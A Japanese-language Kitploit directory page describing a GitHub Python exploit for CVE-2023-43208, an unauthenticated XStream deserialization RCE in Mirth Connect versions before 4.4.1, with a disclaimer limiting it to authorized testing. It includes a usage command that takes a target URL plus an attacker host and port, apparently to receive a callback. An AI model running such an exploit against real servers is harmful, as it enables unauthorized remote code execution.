Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Mirth-Connect-CVE-2023-43208 — PythonによるCVE-2023-43208 Mirth Connect RCE(未認証XStream)の実装 | Kitploit
ツール/GitHubGitHub/azrvs/mirth-connect-cve-2023-43208
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubazrvs/mirth-connect-cve-2023-43208

Mirth-Connect-CVE-2023-43208

PythonによるCVE-2023-43208 Mirth Connect RCE(未認証XStream)の実装

リポジトリを見る
26ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-43208: NextGen Mirth Connect における未認証のリモートコード実行(RCE)

Python Version Vulnerability

このエクスプロイトは、Mirth Connect の XStream エンジン内の深刻なデシリアライゼーションの脆弱性を悪用します。これは CVE-2023-37679 に対する不完全なパッチに起因し、4.4.1 より前のすべてのバージョンで未認証の任意コード実行を可能にします。

使用方法

root@kitploit:~
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>

免責事項

このエクスプロイトスクリプトは、CVE-2023-43208 の緩和を支援する防御者向けの教育目的および認可されたセキュリティ監査専用に意図されています。許可されていないターゲットに対するこのツールの使用は違法であり、その責任はすべてエンドユーザーに帰属します。作者は本ソフトウェアを「現状のまま」いかなる保証もなく提供し、潜在的な誤用や損害に対するすべての責任を否認し、許可されていない活動を容認または推奨するものではありません。自己責任で使用し、適用される法律にのみ準拠して使用してください。

ツールをダウンロード